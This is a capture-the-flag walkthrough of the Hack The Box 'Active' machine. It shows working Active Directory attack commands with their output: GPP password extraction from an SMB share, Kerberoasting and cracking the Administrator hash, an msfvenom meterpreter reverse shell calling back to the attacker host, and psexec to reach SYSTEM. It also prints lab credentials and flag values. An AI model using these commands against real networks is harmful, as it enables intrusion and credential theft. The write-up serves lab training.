Active
About
Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.
Enumeration
Running the script portscan.sh reveals 5 attack vectors, DNS, Kerberos, RPC, SMB and LDAP.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ sudo portscan.sh 10.129.131.133
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ cat PortScan\(10.129.131.133\)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-20 05:54:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-20T05:55:23
|_ start_date: 2023-10-20T05:43:04
|_clock-skew: -10s
PORT STATE SERVICE VERSION
53/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
60777/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
61697/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62135/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62137/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62233/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62266/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
63211/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1
Exploitation
SMB
smbmap reveals a share Replication that we’re allowed to read from.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ smbmap -H 10.129.131.133
[+] IP: 10.129.131.133:445 Name: 10.129.131.133
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Using Get-GPPPassword.py, I’m able to find the credential SVC_TGS:GPPstillStandingStrong2k18 from the Group Policy Preference.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ Get-GPPPassword.py 10.129.131.133 -share Replication
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Listing shares...
- ADMIN$
- C$
- IPC$
- NETLOGON
- Replication
- SYSVOL
- Users
[*] Searching *.xml files...
[*] NewName :
[*] Changed : 2018-07-18 20:46:06
[*] Username : active.htb\SVC_TGS
[*] Password : GPPstillStandingStrong2k18
[*] File : \\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Kerberos
Using GetUserSPNs.py with the credential found, I’m able to obtain a TGS ticket for Administrator.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.131.133 -request -outputfile Administrator.john
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-10-20 01:44:10.554546
By cracking the TGS ticket with john, I’m able to find the password Ticketmaster1968 for the user Administrator.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ john Administrator.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With enough knowledge gained, I’ll create a EXE reverse shell payload using msfvenom.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe
Finally, by running psexec.py with the retrieved password and the payload, I’m able to gain a shell as the user NT AUTHORITY\SYSTEM.
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ psexec.py Administrator:Ticketmaster1968@10.129.131.133 -file exploit.exe
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.129.131.133.....
[*] Found writable share ADMIN$
[*] Uploading file yHslfuXU.exe
[*] Opening SVCManager on 10.129.131.133.....
[*] Creating service ODhK on 10.129.131.133.....
[*] Starting service ODhK.....
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; set AutoRunScript post/windows/manage/migrate; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
AutoRunScript => post/windows/manage/migrate
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.131.133
[*] Session ID 1 (10.10.16.9:4444 -> 10.129.131.133:52988) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DC
[*] Current server process: yHslfuXU.exe (2484)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2992
[+] Successfully migrated into process 2992
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.131.133:52988) at 2023-10-20 02:55:56 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Users\SVC_TGS\Desktop\user.txt'
0d3dd4ed0bad2908290d69403b07f45d
meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
2dd099334cf327e3bbfe691a430fe5b2